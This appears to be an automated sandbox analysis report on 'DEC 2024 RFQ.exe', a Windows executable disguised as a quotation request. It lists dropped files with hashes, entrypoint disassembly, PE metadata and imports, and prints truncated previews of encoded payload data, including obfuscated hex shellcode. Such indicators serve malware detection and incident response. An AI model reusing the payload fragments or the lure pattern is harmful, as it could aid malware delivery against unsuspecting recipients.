                                                                                                                    Preview:EA06..0...{4..V.N.U..=w:mB..j...R.J..i4 .rp..Tf3j.T._40..m.....Z...XKG....`R..#F.N..J...-..d.i..U+.I&3.b.b......U/..(.....l7:.V.W.....sZJ.Na=..g5iU^.N..9....Q*w...+=.."..U..\..\`....P.M.Ui@....]..ZAS.W....V.^....?...F....b3Y.V....TfT*.....).....C..@..J..j....R.\.....jS....\..\p..@...;...`..N...@.9...)V..9..*..-...dRY.&.N..f....U..(~..........`.,_....T.th4.Oz.H.......a........u+.W;_...u....S.L....v.... .\....P.R*..I..K0.qF.E%.....p.... ..$..N@.....G.E)T....H......Q....U.aS.s.t:M6cv.S.]j5N.5......T.S...M...N*....c6.ug.i.^...P6..%V.U...:..k..O...E..J..H4*tJ.D.k...VE|.T......h...s......E$3....R.t..r.`.N*....=.Ug....0........F..*uX...K....:.*.a...UZe.q|.Kk.....9.K.=J..+`..)....{..*uY.J7S.[&..M&.~.Y#R...y.._.r. .)a...s....}..9...=W@..N.s.....t)?..8.Q....}.U....C..m..D.IV.U.u....3.F..I.4...G@..E...S)s.4b7T.P&5..K`..s....)U..&......*P*.X...Q..-..E..S.Mb.....H.O..k.Na6.Ubt....N.Rlvy.@.\.I@...r.;.Ih5Ju".J.L.T.9..f3+G~sT.Q.4.U..J..."...IQ..'...ZiQ.L..

                                                                                                                    C:\Users\user\AppData\Local\Temp\aut9F56.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\DEC 2024 RFQ.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):14622
                                                                                                                    Entropy (8bit):7.624096492649416
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:ITYznw6siKOPIyznfvWME9lMYIUR+ncXyhUlupji66:IAw6si7nfvWLws1F
                                                                                                                    MD5:148971D56461C7AD192459A12BA15568
                                                                                                                    SHA1:7184DF587500F708D7C648CE853CAF45C16162A3
                                                                                                                    SHA-256:344D53DFF49F5900BD702975EF709664BEF139C145B9C3D7BA1EF85C4008FB37
                                                                                                                    SHA-512:9E55AF2C8DE31E0F83EF4399D94F77FD48CBC0A7A2F860E6893334180FF84934BB0F3141A7B893A9FACBBE540334E16585B1EED0197FD9ADD2C14EB5F8F35B98
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                                                                                    C:\Users\user\AppData\Local\Temp\lophophorine

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\DEC 2024 RFQ.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):274432
                                                                                                                    Entropy (8bit):6.825514628477581
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:3giqprKgW+qk+XBt2bCMzOfyvCt5+06CvVTzvU:3lqprK6CnAvvC20rvBzs
                                                                                                                    MD5:2386EBDBB179113CDF6C14E192B6B9E2
                                                                                                                    SHA1:A9D2BCB1C1B07991251153CB30E1FF83761D55C8
                                                                                                                    SHA-256:C7A622B284E8DD4B86BE71AC9A7458047A9F9E9A2B7F35DDF5009E5C81EC1FB0
                                                                                                                    SHA-512:4B353FFF0BC1DC6AD4CB66C4A69DC932A8C60F199EE6735A43497F37BAA303CA25BF3DF23D91A20604A39A799074371D9B31EC85ADF77B05EA721FB1427E11F4
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:...IAUHN<VDS..6B.9V0STNJ.IIBUHN8VDSQ16BU9V0STNJCIIBUHN8VDSQ1.BU9X/.ZN.J.h.T....,:".F0:^$Q>t-+-'&6u*+.$1=qXXb.v..>;*/mDDHqHN8VDSQasBUuW3S...%IIBUHN8V.SS0=C.9V*WTN^CIIBUH..RDSq16B.=V0S.NJcIIBWHN<VDSQ16BQ9V0STNJC.MBUJN8VDSQ36..9V ST^JCIIRUH^8VDSQ1&BU9V0STNJCI.uQH.8VDS.56UE9V0STNJCIIBUHN8VDSQQ2BY9V0STNJCIIBUHN8VDSQ16BU9V0STNJCIIBUHN8VDSQ16BU9V0STNjCIABUHN8VDSQ16Ju9VxSTNJCIIBUHN."!+%16B.!R0StNJCSMBUJN8VDSQ16BU9V0StNJ#g;1'+N8VSCQ16.Q9V"STNVGIIBUHN8VDSQ16.U9..!1"% IINUHN86@SQ36BU.R0STNJCIIBUHN8.DS.16BU9V0STNJCIIBUxv<VDSQ1~BU9T0VT..AI).THM8VD.Q10..;V.STNJCIIBUHN8VDSQ16BU9V0STNJCIIBUHN8VDSQ16BU.+.\...*:.UHN8VDRS22D]1V0STNJCI7BUH.8VD.Q16uU9V.STN'CIIfUHNFVDS/16B19V0!TNJ"IIB.HN89DSQ_6BUGV0SJLbcIIH.nN:~eSQ;6h.Jt0S^.KCIM1vHN2.FSQ5EfU9\.PTNN0lIB_.J8V@ w16H.<V0W~.J@._DUHUWoDS[15.@?V0H~hJAasBUBN.pDP.$0BU"|.SV.CCIMh.;S8VB{.16H!0V0Q.DJCMc\W`.8VNysO=BU=}0yv0FCIMiUblF[DSU.6hK;.=STJ`a7GBULe8|f-^16F~9|.Q.AJCMc`+XN8RoS{.HSU9R.S~l4QIIF~Hd.(WSQ5.B..($STJaCck<@HN<}DysO BU=}0yv0]CIMiUblFNDSU.6hK;.(STJ`Ec+B'.[8&G

                                                                                                                    C:\Users\user\AppData\Local\Temp\murky

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\DEC 2024 RFQ.exe
                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):143378
                                                                                                                    Entropy (8bit):2.9930818019662
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:AIXLr44+F05BDKoPH70FlkvjA6oGJWvGcu29IwyJuv35rWVjjYqnBaAJZdjurebD:H3LjwknWGcu29IwyJuv35rWVgqnBaA
                                                                                                                    MD5:EAFE1A7A774A77396F39A32AD769E49E
                                                                                                                    SHA1:15ED3CE62E9145FD0DA627D66581F932F8F1E19D
                                                                                                                    SHA-256:AE4294EA8D412112A05319EF9D36C240AD111FCA54EFBAFCEB9CB20C32298266
                                                                                                                    SHA-512:828AC04CD8041B76B731C3A29F74C086FA8442174C9A97BA9E286AED6654A438DED7D8D4479273F0B8954C76C67D4698A980FB5D8748FAD7A4781864BA641EF7
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):6.989132493353303
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:DEC 2024 RFQ.exe
                                                                                                                    File size:1'010'688 bytes
                                                                                                                    MD5:34b4d7918dc670f64013e5d1f58a85cd
                                                                                                                    SHA1:dc5af092e9c5b2b38a2e72b03a2784fad36f20e6
                                                                                                                    SHA256:3a0034689c3ef94d1e243b02eeca73fa564da13b1f09509d9cc290240ccc2b17
                                                                                                                    SHA512:080f3df60bff200c4d29a65eb67dcc381bc04200c5b6e3681b2592ef64aa776e04cb71e8966b8cb56c42577cbc2be89ff8beb1e1d99ff54f1d18a7fdd2102907
                                                                                                                    SSDEEP:24576:tu6J33O0c+JY5UZ+XC0kGso6FaSrQ00voPIWY:fu0c++OCvkGs9FaSrZ0wDY
                                                                                                                    TLSH:6025BE22B3DDC360CB669173BF69B7056EBF7C610630B85B2F980D79A950171262C7A3
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                                                                    File Icon

                                                                                                                    Icon Hash:6b69616563c36a25

                                                                                                                    Static PE Info

                                                                                                                    General

                                                                                                                    Entrypoint:0x427dcd
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x6758BF92 [Tue Dec 10 22:24:18 2024 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:1
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:1
                                                                                                                    Subsystem Version Major:5
                                                                                                                    Subsystem Version Minor:1
                                                                                                                    Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                                                    Entrypoint Preview

                                                                                                                    Instruction
                                                                                                                    call 00007FABB8BDC85Ah
                                                                                                                    jmp 00007FABB8BCF624h
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    push edi
                                                                                                                    push esi
                                                                                                                    mov esi, dword ptr [esp+10h]
                                                                                                                    mov ecx, dword ptr [esp+14h]
                                                                                                                    mov edi, dword ptr [esp+0Ch]
                                                                                                                    mov eax, ecx
                                                                                                                    mov edx, ecx
                                                                                                                    add eax, esi
                                                                                                                    cmp edi, esi
                                                                                                                    jbe 00007FABB8BCF7AAh
                                                                                                                    cmp edi, eax
                                                                                                                    jc 00007FABB8BCFB0Eh
                                                                                                                    bt dword ptr [004C31FCh], 01h
                                                                                                                    jnc 00007FABB8BCF7A9h
                                                                                                                    rep movsb
                                                                                                                    jmp 00007FABB8BCFABCh
                                                                                                                    cmp ecx, 00000080h
                                                                                                                    jc 00007FABB8BCF974h
                                                                                                                    mov eax, edi
                                                                                                                    xor eax, esi
                                                                                                                    test eax, 0000000Fh
                                                                                                                    jne 00007FABB8BCF7B0h
                                                                                                                    bt dword ptr [004BE324h], 01h
                                                                                                                    jc 00007FABB8BCFC80h
                                                                                                                    bt dword ptr [004C31FCh], 00000000h
                                                                                                                    jnc 00007FABB8BCF94Dh
                                                                                                                    test edi, 00000003h
                                                                                                                    jne 00007FABB8BCF95Eh
                                                                                                                    test esi, 00000003h
                                                                                                                    jne 00007FABB8BCF93Dh
                                                                                                                    bt edi, 02h
                                                                                                                    jnc 00007FABB8BCF7AFh
                                                                                                                    mov eax, dword ptr [esi]
                                                                                                                    sub ecx, 04h
                                                                                                                    lea esi, dword ptr [esi+04h]
                                                                                                                    mov dword ptr [edi], eax
                                                                                                                    lea edi, dword ptr [edi+04h]
                                                                                                                    bt edi, 03h
                                                                                                                    jnc 00007FABB8BCF7B3h
                                                                                                                    movq xmm1, qword ptr [esi]
                                                                                                                    sub ecx, 08h
                                                                                                                    lea esi, dword ptr [esi+08h]
                                                                                                                    movq qword ptr [edi], xmm1
                                                                                                                    lea edi, dword ptr [edi+08h]
                                                                                                                    test esi, 00000007h
                                                                                                                    je 00007FABB8BCF805h
                                                                                                                    bt esi, 03h
                                                                                                                    jnc 00007FABB8BCF858h

                                                                                                                    Rich Headers

                                                                                                                    Programming Language:
                                                                                                                    • [ASM] VS2013 build 21005
                                                                                                                    • [ C ] VS2013 build 21005
                                                                                                                    • [C++] VS2013 build 21005
                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                    • [ASM] VS2013 UPD4 build 31101
                                                                                                                    • [RES] VS2013 build 21005
                                                                                                                    • [LNK] VS2013 UPD4 build 31101

                                                                                                                    Data Directories

                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x2e378.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xf60000x711c.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                    Sections

                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .rsrc0xc70000x2e3780x2e400067ef990aebdf95e234c494403552e32False0.9534470016891892data7.91696298436049IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .reloc0xf60000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                    Resources

                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_ICON0xc74580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                    RT_ICON0xc75800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                    RT_ICON0xc76a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                    RT_ICON0xc77d00xe23PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8623929262227135
                                                                                                                    RT_MENU0xc85f40x50dataEnglishGreat Britain0.9
                                                                                                                    RT_STRING0xc86440x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                    RT_STRING0xc8bd80x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                    RT_STRING0xc92640x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                    RT_STRING0xc96f40x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                    RT_STRING0xc9cf00x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                    RT_STRING0xca34c0x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                    RT_STRING0xca7b40x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                    RT_RCDATA0xca90c0x2a550data1.0003518040047983
                                                                                                                    RT_GROUP_ICON0xf4e5c0x14dataEnglishGreat Britain1.2
                                                                                                                    RT_GROUP_ICON0xf4e700x14dataEnglishGreat Britain1.25
                                                                                                                    RT_GROUP_ICON0xf4e840x14dataEnglishGreat Britain1.15
                                                                                                                    RT_GROUP_ICON0xf4e980x14dataEnglishGreat Britain1.25
                                                                                                                    RT_VERSION0xf4eac0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                    RT_MANIFEST0xf4f880x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                                    Imports

                                                                                                                    DLLImport
                                                                                                                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                                                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                    UxTheme.dllIsThemeActive
                                                                                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                    USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                    GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                    COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                    OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                                                    Possible Origin

                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                    EnglishGreat Britain

                                                                                                                    Network Behavior

                                                                                                                    Suricata IDS Alerts

